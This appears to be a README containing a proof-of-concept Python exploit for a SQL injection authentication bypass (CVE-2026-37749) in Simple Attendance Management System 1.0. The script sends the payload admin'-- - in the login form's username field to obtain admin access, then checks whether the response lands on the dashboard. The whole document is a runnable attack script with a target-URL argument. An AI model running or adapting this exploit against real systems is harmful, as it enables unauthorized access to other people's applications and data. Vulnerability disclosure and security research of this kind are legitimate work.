README.md
Rendering markdown...
#!/usr/bin/env python3
# Exploit Title: Simple Attendance Management System 1.0 - SQLi Authentication Bypass
# Date: 2026-04-16
# Exploit Author: Varad AP Mene ([email protected])
# Vendor Homepage: https://codeastro.com/simple-attendance-management-system-in-php-with-source-code/
# Software Link: https://codeastro.com/simple-attendance-management-system-in-php-with-source-code/
# Version: 1.0
# Tested on: Windows 10 / XAMPP, Kali Linux
# CVE: CVE-2026-37749
import requests
import argparse
import sys
def exploit(base_url):
url = f"{base_url}/index.php"
payload = "admin'-- -"
data = {
'username': payload,
'password': 'anything',
'type': 'admin',
'submit': 'submit'
}
session = requests.Session()
session.headers.update({'User-Agent': 'Mozilla/5.0'})
print(f"[*] Target : {url}")
print(f"[*] Payload : {payload}")
print(f"[*] Sending request...")
r = session.post(url, data=data, timeout=10, allow_redirects=True)
if 'dashboard' in r.url or 'logout' in r.text.lower():
print(f"[+] SUCCESS! Authentication bypassed!")
print(f"[+] Redirected to: {r.url}")
return True
else:
print(f"[-] Failed. Status: {r.status_code}")
return False
def main():
parser = argparse.ArgumentParser(
description='CVE-2026-37749 - SQLi Auth Bypass PoC'
)
parser.add_argument('--url', required=True,
help='Target URL e.g. http://192.168.1.1/attendance')
args = parser.parse_args()
print("=" * 60)
print("CVE-2026-37749 — SQLi Authentication Bypass")
print("Product: Simple Attendance Management System 1.0")
print("Author : Varad AP Mene")
print("=" * 60)
print()
try:
result = exploit(args.url.rstrip('/'))
sys.exit(0 if result else 1)
except Exception as e:
print(f"[-] Error: {e}")
sys.exit(1)
if __name__ == '__main__':
main()